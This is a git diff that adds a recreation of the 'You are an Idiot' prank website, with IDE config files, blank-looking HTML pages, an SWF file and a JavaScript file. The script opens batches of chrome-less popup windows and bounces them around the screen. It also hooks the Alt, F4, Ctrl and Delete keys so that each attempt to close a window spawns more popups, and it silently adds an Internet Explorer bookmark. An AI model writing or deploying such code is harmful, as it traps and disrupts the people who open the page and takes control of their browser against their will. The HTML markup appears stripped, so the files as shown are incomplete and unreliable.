diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0b82ad4 --- /dev/null +++ b/.gitignore @@ -0,0 +1,79 @@ +### PhpStorm+all template +# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider +# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 + +# User-specific stuff +.idea/**/workspace.xml +.idea/**/tasks.xml +.idea/**/usage.statistics.xml +.idea/**/dictionaries +.idea/**/shelf + +# AWS User-specific +.idea/**/aws.xml + +# Generated files +.idea/**/contentModel.xml + +# Sensitive or high-churn files +.idea/**/dataSources/ +.idea/**/dataSources.ids +.idea/**/dataSources.local.xml +.idea/**/sqlDataSources.xml +.idea/**/dynamic.xml +.idea/**/uiDesigner.xml +.idea/**/dbnavigator.xml + +# Gradle +.idea/**/gradle.xml +.idea/**/libraries + +# Gradle and Maven with auto-import +# When using Gradle or Maven with auto-import, you should exclude module files, +# since they will be recreated, and may cause churn. Uncomment if using +# auto-import. +# .idea/artifacts +# .idea/compiler.xml +# .idea/jarRepositories.xml +# .idea/modules.xml +# .idea/*.iml +# .idea/modules +# *.iml +# *.ipr + +# CMake +cmake-build-*/ + +# Mongo Explorer plugin +.idea/**/mongoSettings.xml + +# File-based project format +*.iws + +# IntelliJ +out/ + +# mpeltonen/sbt-idea plugin +.idea_modules/ + +# JIRA plugin +atlassian-ide-plugin.xml + +# Cursive Clojure plugin +.idea/replstate.xml + +# SonarLint plugin +.idea/sonarlint/ + +# Crashlytics plugin (for Android Studio and IntelliJ) +com_crashlytics_export_strings.xml +crashlytics.properties +crashlytics-build.properties +fabric.properties + +# Editor-based Rest Client +.idea/httpRequests + +# Android studio 3.1+ serialized cache file +.idea/caches/build_file_checksums.ser + diff --git a/.idea/.gitignore b/.idea/.gitignore new file mode 100644 index 0000000..13566b8 --- /dev/null +++ b/.idea/.gitignore @@ -0,0 +1,8 @@ +# Default ignored files +/shelf/ +/workspace.xml +# Editor-based HTTP Client requests +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/.idea/flash.iml b/.idea/flash.iml new file mode 100644 index 0000000..c956989 --- /dev/null +++ b/.idea/flash.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/.idea/modules.xml b/.idea/modules.xml new file mode 100644 index 0000000..edf8693 --- /dev/null +++ b/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/.idea/php.xml b/.idea/php.xml new file mode 100644 index 0000000..f324872 --- /dev/null +++ b/.idea/php.xml @@ -0,0 +1,19 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/.idea/vcs.xml b/.idea/vcs.xml new file mode 100644 index 0000000..35eb1dd --- /dev/null +++ b/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/favicon.ico b/favicon.ico new file mode 100644 index 0000000..fc765b4 Binary files /dev/null and b/favicon.ico differ diff --git a/index.html b/index.html new file mode 100644 index 0000000..a76320b --- /dev/null +++ b/index.html @@ -0,0 +1,30 @@ + + + You are an Idiot! (dot cc) + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/lol.html b/lol.html new file mode 100644 index 0000000..c1c2694 --- /dev/null +++ b/lol.html @@ -0,0 +1,15 @@ + + + You are an idiot! + + + + + + + + + + + + \ No newline at end of file diff --git a/scripts/you.js b/scripts/you.js new file mode 100644 index 0000000..e5e9320 --- /dev/null +++ b/scripts/you.js @@ -0,0 +1,81 @@ +function bookmark() { + if ((navigator.appName == "Microsoft Internet Explorer") + && (parseInt(navigator.appVersion) >= 4)) + { + var url="lol.html"; + var title="Idiot!"; + window.external.AddFavorite(url,title); + } + } + + var xOff = 5; + var yOff = 5; + var xPos = 400; + var yPos = -100; + var flagRun = 1; + +function changeTitle(title) { + document.title = title; +} + +function openWindow(url) { + aWindow = window.open(url, "_blank", 'menubar=no, status=no, toolbar=no, resizable=no, width=357, height=330, titlebar=no, alwaysRaised=yes'); +} + +function procreate() { + changeTitle("Idiot!"); + for (var i = 0; i < 5; i++) { + openWindow('lol.html'); + } +} + +function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) { alert("You are an idiot!"); procreate(); } } +function ctrlkey() { if (event.keyCode == 17) { alert("You are an idiot!"); procreate(); } } +function delkey() { if (event.keyCode == 46) { alert("You are an idiot!"); procreate(); } } + +function newXlt(){ + xOff = Math.ceil(-6 * Math.random()) * 5 - 10 ; + window.focus() +} + +function newXrt(){ + xOff = Math.ceil(7 * Math.random()) * 5 - 10 ; +} + +function newYup(){ + yOff = Math.ceil(-6 * Math.random()) * 5 - 10 ; +} + +function newYdn(){ + yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ; +} + +function fOff(){ + flagrun = 0; +} + +function playBall() { + xPos += xOff; + yPos += yOff; + + if (xPos > screen.width - 357) { + newXlt(); + } + + if (xPos < 0){ + newXrt(); + } + + if (yPos > screen.height - 330) { + newYup(); + } + + if (yPos < 0){ + newYdn(); + } + + if (flagRun == 1){ + window.moveTo(xPos, yPos); + setTimeout('playBall()', 1); + } +} \ No newline at end of file diff --git a/youare.swf b/youare.swf new file mode 100644 index 0000000..b96bb6b Binary files /dev/null and b/youare.swf differ